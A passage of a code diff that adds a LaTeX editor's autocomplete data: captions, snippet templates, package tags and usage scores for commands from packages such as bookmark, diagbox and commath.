caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'metalogo-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'metalogo-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'metalogo-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'metalogo-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'metalogo-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'metalogo-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'metalogo-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'metalogo-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'metalogo-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'metalogo-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'metalogo-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'metalogo-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'metalogo-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'metalogo-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'metalogo-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'metalogo-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'metalogo-cmd', + score: 0.004719094298848707, + }, + ], + bookmark: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bookmark-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\pdfbookmark[]{}{}', + snippet: '\\pdfbookmark[$1]{$2}{$3}', + meta: 'bookmark-cmd', + score: 0.006492248863367502, + }, + { + caption: '\\bookmarkget{}', + snippet: '\\bookmarkget{$1}', + meta: 'bookmark-cmd', + score: 0.00026847053008917257, + }, + { + caption: '\\bookmarksetup{}', + snippet: '\\bookmarksetup{$1}', + meta: 'bookmark-cmd', + score: 0.001134118016265821, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'bookmark-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'bookmark-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'bookmark-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'bookmark-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\AtBeginShipout{}', + snippet: '\\AtBeginShipout{$1}', + meta: 'bookmark-cmd', + score: 0.00047530324346933345, + }, + { + caption: '\\AtBeginShipoutNext{}', + snippet: '\\AtBeginShipoutNext{$1}', + meta: 'bookmark-cmd', + score: 0.0005277905480209891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bookmark-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\UrlBreaks{}', + snippet: '\\UrlBreaks{$1}', + meta: 'bookmark-cmd', + score: 0.001030592515645366, + }, + { + caption: '\\UrlBreaks', + snippet: '\\UrlBreaks', + meta: 'bookmark-cmd', + score: 0.001030592515645366, + }, + { + caption: '\\Url', + snippet: '\\Url', + meta: 'bookmark-cmd', + score: 0.0002854206807593436, + }, + { + caption: '\\UrlOrds{}', + snippet: '\\UrlOrds{$1}', + meta: 'bookmark-cmd', + score: 0.0006882563723629154, + }, + { + caption: '\\UrlOrds', + snippet: '\\UrlOrds', + meta: 'bookmark-cmd', + score: 0.0006882563723629154, + }, + { + caption: '\\urlstyle{}', + snippet: '\\urlstyle{$1}', + meta: 'bookmark-cmd', + score: 0.010515056688180681, + }, + { + caption: '\\urldef{}', + snippet: '\\urldef{$1}', + meta: 'bookmark-cmd', + score: 0.008041789461944983, + }, + { + caption: '\\UrlBigBreaks{}', + snippet: '\\UrlBigBreaks{$1}', + meta: 'bookmark-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\UrlFont{}', + snippet: '\\UrlFont{$1}', + meta: 'bookmark-cmd', + score: 0.0032990580087398644, + }, + { + caption: '\\UrlSpecials{}', + snippet: '\\UrlSpecials{$1}', + meta: 'bookmark-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\UrlNoBreaks', + snippet: '\\UrlNoBreaks', + meta: 'bookmark-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\nameref{}', + snippet: '\\nameref{$1}', + meta: 'bookmark-cmd', + score: 0.009472569279662113, + }, + { + caption: '\\pdfbookmark[]{}{}', + snippet: '\\pdfbookmark[$1]{$2}{$3}', + meta: 'bookmark-cmd', + score: 0.006492248863367502, + }, + { + caption: '\\figureautorefname', + snippet: '\\figureautorefname', + meta: 'bookmark-cmd', + score: 0.00014582556188448738, + }, + { + caption: '\\figureautorefname{}', + snippet: '\\figureautorefname{$1}', + meta: 'bookmark-cmd', + score: 0.00014582556188448738, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'bookmark-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'bookmark-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'bookmark-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\footnoteautorefname', + snippet: '\\footnoteautorefname', + meta: 'bookmark-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\roman{}', + snippet: '\\roman{$1}', + meta: 'bookmark-cmd', + score: 0.005553384455935491, + }, + { + caption: '\\roman', + snippet: '\\roman', + meta: 'bookmark-cmd', + score: 0.005553384455935491, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'bookmark-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\MakeLowercase{}', + snippet: '\\MakeLowercase{$1}', + meta: 'bookmark-cmd', + score: 0.017289599800633146, + }, + { + caption: '\\textunderscore', + snippet: '\\textunderscore', + meta: 'bookmark-cmd', + score: 0.001509072212764015, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'bookmark-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\begin{}', + snippet: '\\begin{$1}', + meta: 'bookmark-cmd', + score: 7.849662248028187, + }, + { + caption: '\\begin{}[]', + snippet: '\\begin{$1}[$2]', + meta: 'bookmark-cmd', + score: 7.849662248028187, + }, + { + caption: '\\begin{}{}', + snippet: '\\begin{$1}{$2}', + meta: 'bookmark-cmd', + score: 7.849662248028187, + }, + { + caption: '\\FancyVerbLineautorefname', + snippet: '\\FancyVerbLineautorefname', + meta: 'bookmark-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\hyperlink{}{}', + snippet: '\\hyperlink{$1}{$2}', + meta: 'bookmark-cmd', + score: 0.00978652043902115, + }, + { + caption: '\\tableautorefname', + snippet: '\\tableautorefname', + meta: 'bookmark-cmd', + score: 0.00012704528567339081, + }, + { + caption: '\\tableautorefname{}', + snippet: '\\tableautorefname{$1}', + meta: 'bookmark-cmd', + score: 0.00012704528567339081, + }, + { + caption: '\\equationautorefname', + snippet: '\\equationautorefname', + meta: 'bookmark-cmd', + score: 0.00018777198999871106, + }, + { + caption: '\\equationautorefname{}', + snippet: '\\equationautorefname{$1}', + meta: 'bookmark-cmd', + score: 0.00018777198999871106, + }, + { + caption: '\\chapterautorefname', + snippet: '\\chapterautorefname', + meta: 'bookmark-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\TeX', + snippet: '\\TeX', + meta: 'bookmark-cmd', + score: 0.02873756018238537, + }, + { + caption: '\\TeX{}', + snippet: '\\TeX{$1}', + meta: 'bookmark-cmd', + score: 0.02873756018238537, + }, + { + caption: '\\protect', + snippet: '\\protect', + meta: 'bookmark-cmd', + score: 0.0200686676229443, + }, + { + caption: '\\appendixautorefname', + snippet: '\\appendixautorefname', + meta: 'bookmark-cmd', + score: 7.950698053641679e-5, + }, + { + caption: '\\appendixautorefname{}', + snippet: '\\appendixautorefname{$1}', + meta: 'bookmark-cmd', + score: 7.950698053641679e-5, + }, + { + caption: '\\newlabel{}{}', + snippet: '\\newlabel{$1}{$2}', + meta: 'bookmark-cmd', + score: 0.00029737672328168955, + }, + { + caption: '\\texorpdfstring{}{}', + snippet: '\\texorpdfstring{$1}{$2}', + meta: 'bookmark-cmd', + score: 0.0073781967296121, + }, + { + caption: '\\refstepcounter{}', + snippet: '\\refstepcounter{$1}', + meta: 'bookmark-cmd', + score: 0.002140559856649122, + }, + { + caption: '\\alph', + snippet: '\\alph', + meta: 'bookmark-cmd', + score: 0.01034327266194849, + }, + { + caption: '\\alph{}', + snippet: '\\alph{$1}', + meta: 'bookmark-cmd', + score: 0.01034327266194849, + }, + { + caption: '\\pageref{}', + snippet: '\\pageref{$1}', + meta: 'bookmark-cmd', + score: 0.019788865471151957, + }, + { + caption: '\\item', + snippet: '\\item ', + meta: 'bookmark-cmd', + score: 3.800886892251021, + }, + { + caption: '\\item[]', + snippet: '\\item[$1] ', + meta: 'bookmark-cmd', + score: 3.800886892251021, + }, + { + caption: '\\LaTeX', + snippet: '\\LaTeX', + meta: 'bookmark-cmd', + score: 0.2334089308452787, + }, + { + caption: '\\LaTeX{}', + snippet: '\\LaTeX{$1}', + meta: 'bookmark-cmd', + score: 0.2334089308452787, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bookmark-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\itemautorefname', + snippet: '\\itemautorefname', + meta: 'bookmark-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\caption{}', + snippet: '\\caption{$1}', + meta: 'bookmark-cmd', + score: 1.2569477427490174, + }, + { + caption: '\\sectionautorefname', + snippet: '\\sectionautorefname', + meta: 'bookmark-cmd', + score: 0.0019832324299155183, + }, + { + caption: '\\sectionautorefname{}', + snippet: '\\sectionautorefname{$1}', + meta: 'bookmark-cmd', + score: 0.0019832324299155183, + }, + { + caption: '\\LaTeXe', + snippet: '\\LaTeXe', + meta: 'bookmark-cmd', + score: 0.007928096378157487, + }, + { + caption: '\\LaTeXe{}', + snippet: '\\LaTeXe{$1}', + meta: 'bookmark-cmd', + score: 0.007928096378157487, + }, + { + caption: '\\footref{}', + snippet: '\\footref{$1}', + meta: 'bookmark-cmd', + score: 0.0003680857021151614, + }, + { + caption: '\\footref', + snippet: '\\footref', + meta: 'bookmark-cmd', + score: 0.0003680857021151614, + }, + { + caption: '\\hypertarget{}{}', + snippet: '\\hypertarget{$1}{$2}', + meta: 'bookmark-cmd', + score: 0.009652820108904094, + }, + { + caption: '\\theoremautorefname', + snippet: '\\theoremautorefname', + meta: 'bookmark-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\maketitle', + snippet: '\\maketitle', + meta: 'bookmark-cmd', + score: 0.7504160124360846, + }, + { + caption: '\\subparagraphautorefname', + snippet: '\\subparagraphautorefname', + meta: 'bookmark-cmd', + score: 0.0005446476945175932, + }, + { + caption: '\\url{}', + snippet: '\\url{$1}', + meta: 'bookmark-cmd', + score: 0.13586474005868793, + }, + { + caption: '\\author{}', + snippet: '\\author{$1}', + meta: 'bookmark-cmd', + score: 0.8973590434087177, + }, + { + caption: '\\author[]{}', + snippet: '\\author[$1]{$2}', + meta: 'bookmark-cmd', + score: 0.8973590434087177, + }, + { + caption: '\\href{}{}', + snippet: '\\href{$1}{$2}', + meta: 'bookmark-cmd', + score: 0.27111130260612365, + }, + { + caption: '\\Roman{}', + snippet: '\\Roman{$1}', + meta: 'bookmark-cmd', + score: 0.0038703587462843594, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'bookmark-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\autoref{}', + snippet: '\\autoref{$1}', + meta: 'bookmark-cmd', + score: 0.03741172773691362, + }, + { + caption: '\\nolinkurl{}', + snippet: '\\nolinkurl{$1}', + meta: 'bookmark-cmd', + score: 0.0004995635515943437, + }, + { + caption: '\\end{}', + snippet: '\\end{$1}', + meta: 'bookmark-cmd', + score: 7.847906405228455, + }, + { + caption: '\\phantomsection', + snippet: '\\phantomsection', + meta: 'bookmark-cmd', + score: 0.0174633138331273, + }, + { + caption: '\\MakeUppercase{}', + snippet: '\\MakeUppercase{$1}', + meta: 'bookmark-cmd', + score: 0.006776001543888959, + }, + { + caption: '\\MakeUppercase', + snippet: '\\MakeUppercase', + meta: 'bookmark-cmd', + score: 0.006776001543888959, + }, + { + caption: '\\partautorefname', + snippet: '\\partautorefname', + meta: 'bookmark-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\Itemautorefname{}', + snippet: '\\Itemautorefname{$1}', + meta: 'bookmark-cmd', + score: 6.006262128895586e-5, + }, + { + caption: '\\halign{}', + snippet: '\\halign{$1}', + meta: 'bookmark-cmd', + score: 0.00017906650306643613, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'bookmark-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\ref{}', + snippet: '\\ref{$1}', + meta: 'bookmark-cmd', + score: 1.4380093454211778, + }, + { + caption: '\\Alph{}', + snippet: '\\Alph{$1}', + meta: 'bookmark-cmd', + score: 0.002233258780143355, + }, + { + caption: '\\Alph', + snippet: '\\Alph', + meta: 'bookmark-cmd', + score: 0.002233258780143355, + }, + { + caption: '\\appendix', + snippet: '\\appendix', + meta: 'bookmark-cmd', + score: 0.047007158741781095, + }, + { + caption: '\\MP', + snippet: '\\MP', + meta: 'bookmark-cmd', + score: 0.00018344383742255004, + }, + { + caption: '\\MP{}', + snippet: '\\MP{$1}', + meta: 'bookmark-cmd', + score: 0.00018344383742255004, + }, + { + caption: '\\paragraphautorefname', + snippet: '\\paragraphautorefname', + meta: 'bookmark-cmd', + score: 0.0005446476945175932, + }, + { + caption: '\\citeN{}', + snippet: '\\citeN{$1}', + meta: 'bookmark-cmd', + score: 0.0018503938529945614, + }, + { + caption: '\\citeN', + snippet: '\\citeN', + meta: 'bookmark-cmd', + score: 0.0018503938529945614, + }, + { + caption: '\\addcontentsline{}{}{}', + snippet: '\\addcontentsline{$1}{$2}{$3}', + meta: 'bookmark-cmd', + score: 0.07503475348393239, + }, + { + caption: '\\subsectionautorefname', + snippet: '\\subsectionautorefname', + meta: 'bookmark-cmd', + score: 0.0012546605780895737, + }, + { + caption: '\\subsectionautorefname{}', + snippet: '\\subsectionautorefname{$1}', + meta: 'bookmark-cmd', + score: 0.0012546605780895737, + }, + { + caption: '\\hyperref[]{}', + snippet: '\\hyperref[$1]{$2}', + meta: 'bookmark-cmd', + score: 0.004515152477030062, + }, + { + caption: '\\arabic{}', + snippet: '\\arabic{$1}', + meta: 'bookmark-cmd', + score: 0.02445837629741638, + }, + { + caption: '\\arabic', + snippet: '\\arabic', + meta: 'bookmark-cmd', + score: 0.02445837629741638, + }, + { + caption: '\\newline', + snippet: '\\newline', + meta: 'bookmark-cmd', + score: 0.3311721696201715, + }, + { + caption: '\\hypersetup{}', + snippet: '\\hypersetup{$1}', + meta: 'bookmark-cmd', + score: 0.06967310843464661, + }, + { + caption: '\\subsubsectionautorefname', + snippet: '\\subsubsectionautorefname', + meta: 'bookmark-cmd', + score: 0.0012064581899162352, + }, + { + caption: '\\subsubsectionautorefname{}', + snippet: '\\subsubsectionautorefname{$1}', + meta: 'bookmark-cmd', + score: 0.0012064581899162352, + }, + { + caption: '\\title{}', + snippet: '\\title{$1}', + meta: 'bookmark-cmd', + score: 0.9202908262245683, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bookmark-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'bookmark-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'bookmark-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bookmark-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'bookmark-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bookmark-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bookmark-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'bookmark-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bookmark-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'bookmark-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'bookmark-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'bookmark-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'bookmark-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'bookmark-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bookmark-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bookmark-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'bookmark-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'bookmark-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'bookmark-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bookmark-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bookmark-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'bookmark-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'bookmark-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'bookmark-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bookmark-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'bookmark-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'bookmark-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bookmark-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'bookmark-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\check{}', + snippet: '\\check{$1}', + meta: 'bookmark-cmd', + score: 0.0058342578961340175, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'bookmark-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bookmark-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'bookmark-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bookmark-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'bookmark-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bookmark-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'bookmark-cmd', + score: 0.00530510025314411, + }, + ], + anysize: [ + { + caption: '\\marginsize{}{}{}{}', + snippet: '\\marginsize{$1}{$2}{$3}{$4}', + meta: 'anysize-cmd', + score: 0.0012034744434699038, + }, + ], + diagbox: [ + { + caption: '\\diagbox[]{}{}', + snippet: '\\diagbox[$1]{$2}{$3}', + meta: 'diagbox-cmd', + score: 2.2176553306779127e-5, + }, + { + caption: '\\backslashbox{}{}', + snippet: '\\backslashbox{$1}{$2}', + meta: 'diagbox-cmd', + score: 0.0005060776550832729, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'diagbox-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\Line', + snippet: '\\Line', + meta: 'diagbox-cmd', + score: 0.0006078790177929149, + }, + { + caption: '\\polygon', + snippet: '\\polygon', + meta: 'diagbox-cmd', + score: 0.0008987552240147395, + }, + { + caption: '\\line', + snippet: '\\line', + meta: 'diagbox-cmd', + score: 0.014519741542622297, + }, + { + caption: '\\polyline', + snippet: '\\polyline', + meta: 'diagbox-cmd', + score: 0.00022468880600368487, + }, + { + caption: '\\vector', + snippet: '\\vector', + meta: 'diagbox-cmd', + score: 0.002970308722584179, + }, + { + caption: '\\endtabular', + snippet: '\\endtabular', + meta: 'diagbox-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'diagbox-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\array{}', + snippet: '\\array{$1}', + meta: 'diagbox-cmd', + score: 2.650484574842396e-5, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'diagbox-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\tabular{}', + snippet: '\\tabular{$1}', + meta: 'diagbox-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'diagbox-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\newcolumntype{}[]{}', + snippet: '\\newcolumntype{$1}[$2]{$3}', + meta: 'diagbox-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\newcolumntype{}{}', + snippet: '\\newcolumntype{$1}{$2}', + meta: 'diagbox-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'diagbox-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'diagbox-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'diagbox-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'diagbox-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'diagbox-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'diagbox-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'diagbox-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'diagbox-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'diagbox-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'diagbox-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'diagbox-cmd', + score: 0.028955796305270766, + }, + ], + commath: [ + { + caption: '\\dod{}{}', + snippet: '\\dod{$1}{$2}', + meta: 'commath-cmd', + score: 7.950032807135384e-5, + }, + { + caption: '\\dpd{}{}', + snippet: '\\dpd{$1}{$2}', + meta: 'commath-cmd', + score: 0.00022966761442835552, + }, + { + caption: '\\dpd[]{}{}', + snippet: '\\dpd[$1]{$2}{$3}', + meta: 'commath-cmd', + score: 0.00022966761442835552, + }, + { + caption: '\\pmb{}', + snippet: '\\pmb{$1}', + meta: 'commath-cmd', + score: 0.019171182556792562, + }, + { + caption: '\\boldsymbol{}', + snippet: '\\boldsymbol{$1}', + meta: 'commath-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\boldsymbol', + snippet: '\\boldsymbol', + meta: 'commath-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\longmapsto', + snippet: '\\longmapsto', + meta: 'commath-cmd', + score: 0.0017755897148012264, + }, + { + caption: '\\Check{}', + snippet: '\\Check{$1}', + meta: 'commath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'commath-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'commath-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\iff', + snippet: '\\iff', + meta: 'commath-cmd', + score: 0.004209937150980285, + }, + { + caption: '\\And', + snippet: '\\And', + meta: 'commath-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\And{}', + snippet: '\\And{$1}', + meta: 'commath-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\oint', + snippet: '\\oint', + meta: 'commath-cmd', + score: 0.0028650540724050534, + }, + { + caption: '\\boxed{}', + snippet: '\\boxed{$1}', + meta: 'commath-cmd', + score: 0.0035536135737312827, + }, + { + caption: '\\Ddot{}', + snippet: '\\Ddot{$1}', + meta: 'commath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ignorespacesafterend', + snippet: '\\ignorespacesafterend', + meta: 'commath-cmd', + score: 0.0010893680553454854, + }, + { + caption: '\\nonumber', + snippet: '\\nonumber', + meta: 'commath-cmd', + score: 0.051980653969641216, + }, + { + caption: '\\Breve{}', + snippet: '\\Breve{$1}', + meta: 'commath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\mapsto', + snippet: '\\mapsto', + meta: 'commath-cmd', + score: 0.006473769486518971, + }, + { + caption: '\\over{}', + snippet: '\\over{$1}', + meta: 'commath-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\over', + snippet: '\\over', + meta: 'commath-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\bigotimes', + snippet: '\\bigotimes', + meta: 'commath-cmd', + score: 0.000984722260624791, + }, + { + caption: '\\bigoplus', + snippet: '\\bigoplus', + meta: 'commath-cmd', + score: 0.0011508785476242003, + }, + { + caption: '\\theequation', + snippet: '\\theequation', + meta: 'commath-cmd', + score: 0.002995924112493351, + }, + { + caption: '\\bigcap', + snippet: '\\bigcap', + meta: 'commath-cmd', + score: 0.005709261168797874, + }, + { + caption: '\\xrightarrow{}', + snippet: '\\xrightarrow{$1}', + meta: 'commath-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\xrightarrow[]{}', + snippet: '\\xrightarrow[$1]{$2}', + meta: 'commath-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\atop', + snippet: '\\atop', + meta: 'commath-cmd', + score: 0.0006518541515279979, + }, + { + caption: '\\dfrac{}{}', + snippet: '\\dfrac{$1}{$2}', + meta: 'commath-cmd', + score: 0.05397545277891961, + }, + { + caption: '\\pmod', + snippet: '\\pmod', + meta: 'commath-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\pmod{}', + snippet: '\\pmod{$1}', + meta: 'commath-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\notag', + snippet: '\\notag', + meta: 'commath-cmd', + score: 0.00322520920930312, + }, + { + caption: '\\int', + snippet: '\\int', + meta: 'commath-cmd', + score: 0.11946660537765894, + }, + { + caption: '\\Vec{}', + snippet: '\\Vec{$1}', + meta: 'commath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\bigvee', + snippet: '\\bigvee', + meta: 'commath-cmd', + score: 0.0011677288242806726, + }, + { + caption: '\\sum', + snippet: '\\sum', + meta: 'commath-cmd', + score: 0.42607994509619934, + }, + { + caption: '\\hookrightarrow', + snippet: '\\hookrightarrow', + meta: 'commath-cmd', + score: 0.0015607282046545064, + }, + { + caption: '\\bigsqcup', + snippet: '\\bigsqcup', + meta: 'commath-cmd', + score: 0.0003468284144579442, + }, + { + caption: '\\hookleftarrow', + snippet: '\\hookleftarrow', + meta: 'commath-cmd', + score: 0.0016498799924012809, + }, + { + caption: '\\Dot{}', + snippet: '\\Dot{$1}', + meta: 'commath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\dots', + snippet: '\\dots', + meta: 'commath-cmd', + score: 0.0847414497955395, + }, + { + caption: '\\genfrac{}{}{}{}{}{}', + snippet: '\\genfrac{$1}{$2}{$3}{$4}{$5}{$6}', + meta: 'commath-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\genfrac', + snippet: '\\genfrac', + meta: 'commath-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\cfrac{}{}', + snippet: '\\cfrac{$1}{$2}', + meta: 'commath-cmd', + score: 0.006765684097139381, + }, + { + caption: '\\Acute{}', + snippet: '\\Acute{$1}', + meta: 'commath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ldots', + snippet: '\\ldots', + meta: 'commath-cmd', + score: 